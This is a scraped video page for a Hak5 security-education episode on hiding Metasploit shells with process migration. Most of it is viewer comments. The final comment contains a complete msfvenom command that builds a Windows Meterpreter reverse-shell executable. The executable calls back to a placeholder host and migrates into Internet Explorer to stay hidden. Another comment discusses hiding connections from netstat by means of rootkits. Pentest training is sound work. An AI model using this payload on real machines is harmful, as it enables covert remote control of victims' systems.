Hiding Shells: Prepend Migrate - Metasploit Minute [Cyber Security Education]

Рет қаралды 27,108

Hak5

Күн бұрын

Пікірлер: 27

@zacharythomas7283 3 жыл бұрын

Still so relevant 5 years later! thanks!

@JakesMyuseek 6 жыл бұрын

Was able to use this on one of the boxes in the OSCP labs. Thanks, mubix! :D

@Lunatical549 9 жыл бұрын

Even if you guys offered paid for training, i would consider it more than money well spent. You guys are awesome!!

@mubix 9 жыл бұрын

Aaron Dunham Ya, we are doing the Pentesting with Hak5 and see where it goes, if it succeeds then we'll probably do more.

@ministerofpropogandaii5718 9 жыл бұрын

now we are getting into the good stuff, the first patreon ive ever contributed to is about to be your's

@mubix 9 жыл бұрын

Minister of Propoganda II so awesome! Thanks!!

@mariciojongma8582 9 жыл бұрын

where can I find the PostgreSQL database (thats connected to Metasploit) in the directory system?

@AlboCoder 8 жыл бұрын

7:52 Wait... So you still have the meterpreter session of bob.exe now running in svchost.exe which also had another meterpreter session running?

@undervandshobbyenundervand7717 8 жыл бұрын

Greetingsto from EHv9-DK and thanks for a great showAs @Cinder Blake I'm also interested in how to do this with msfvenom. I tried in the name of logic to use set commands in the venom but no luck. The "generate" command doesnt do the trick anymore :( can you help us out ? Best of luck.

9 жыл бұрын

how to hide your activity from netstat as it shows your activity usage with your port and ip? or is that not possible so a vpn or something is required?

@definitelynotadam 9 жыл бұрын

***** I would say impossible without actually replacing the netstat binary with a custom one or using rootkits.

9 жыл бұрын

ok and also i remember years ago i used to ping nasa servers and then about a week later i tried again and the ping results came back blank, i wonder how they blanked the results... very strange.

@zeronairo5669 7 жыл бұрын

Is it just me or do they misuse the word exploit... sending a rigged executable isn't an exploit because there is no vulnerability. Malware != exploit.

@richardvaughn2705 6 жыл бұрын

They are using the dictionary use of the word, which means to use something. Exploit is a verb after all. Exploitation is the noun form.

@vindicator930 9 жыл бұрын

Can you also do Python? System Programming and Security Network Sniffers and Packet Injectors Attacking Web Applications Exploitation Techniques Reverse Engineering Attack Task Automation

@vindicator930 9 жыл бұрын

File handling Directory Navigation Process creation Threads Threading and Queues Signals and IPC Subprocess Client-Server Programming Basics SocketServer Framework Creating a Web Server Packet Sniffing with Raw Sockets Packet Injection with Raw Sockets Packet Sniffing with Scapy Packet Injection with Scapy Fetching Web Pages Parsing HTML Coding a Screen Scraper Form Parsing and Submission with Mechanize Stateful Web Application Browsing with Mechanize XML Parsing and Web Services Immunity Debugger Reading and Writing Memory Assemble Disassemble, Search and Locate Instructions PyHooks Exploiting a Buffer Overflow Portable Executable Analysis Disassembling Code with Pydasm PyDbg Monitoring API Calls Malware Analysis with Sandbox Using pexoect SSH Automation with Paramiko SSH Dictionary Attack with Paramiko SFTP with Paramiko Automating Nmap

@cinderblake9892 8 жыл бұрын

How do I use this inline with with msfvenom I wanted to migrate to internet explorer or edge. I'm also not sure on the program paths. It's nice to do it in interactive console or in armitage but I'm not sure how to set the PrependMigrateProc option in msfvenom for generating a a raw output to use with another program. Any idea or documentation I should read?

@carlwcampbell 8 жыл бұрын

msfvenom -p windows/meterpreter/reverse_tcp -f exe -a x86 --platform windows LHOST=123.45.67.89 LPORT=1234 PrependMigrate=TRUE PrependMigrateProc=iexplorer.exe -o /tmp/evil.exe